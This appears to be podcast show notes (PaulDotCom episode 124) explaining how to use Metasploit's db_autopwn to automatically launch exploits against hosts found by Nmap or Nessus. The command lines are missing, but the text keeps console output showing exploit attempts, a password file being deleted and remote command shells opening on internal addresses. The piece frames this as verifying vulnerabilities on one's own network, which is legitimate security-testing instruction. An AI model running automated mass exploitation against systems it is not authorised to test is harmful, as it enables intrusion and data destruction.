From PaulDotCom episode 124:
Tech Segment: Automating Exploitation With Metasploit's db_autopwn
There is tremendous value in identifying vulnerabilities in your network, whether from the outside looking in, or the inside looking out. I like to try to automate this process as best I can, then use manual methods to further verify my work. For example, lets say I want to quickly verify the results from an Nmap or Nessus scan, and see if any of the Windows hosts are vulnerable to common Microsoft exploits. I can use Metasploit to do this, as it will test for the common remotely exploitable Windows vulnerabilities.
The first step is to setup Metasploit with a database module and create a database:
From here, I have many options. I can import Nmap results from a previous scan using the XML results (-oX):
Using the db_nmap module I can run Nmap directly from Metasploit and populate the database:
I can now launch exploits against known targets, but only by open port (since we ran Nmap and only collected the open port information):
-p means exploit the vulnerabilities according to open port, and -e gives the "exploit" command. When I do this, I give Metasploit a lot of work to do:
[*] Trying target BadBlue 2.72b Universal...
[*] Server may not be vulnerable.
[*] Calling the vulnerable function...
[*] Successfully removed /config/password.txt
[*] Command shell session 1 opened (192.168.1.204:58664 -> 192.168.1.52:34657)
[*] Launching exploit/windows/iis/ms01_023_printer (22/727) against 192.168.1.226:80...
[*] Started bind handler
727 possible exploit vectors! That took a while. So, I decided to run Nessus against my network, then import the Nessus results:
Now I run db_autopwn, and tell it to select modules based on the vulnerability reference:
This produces much better results: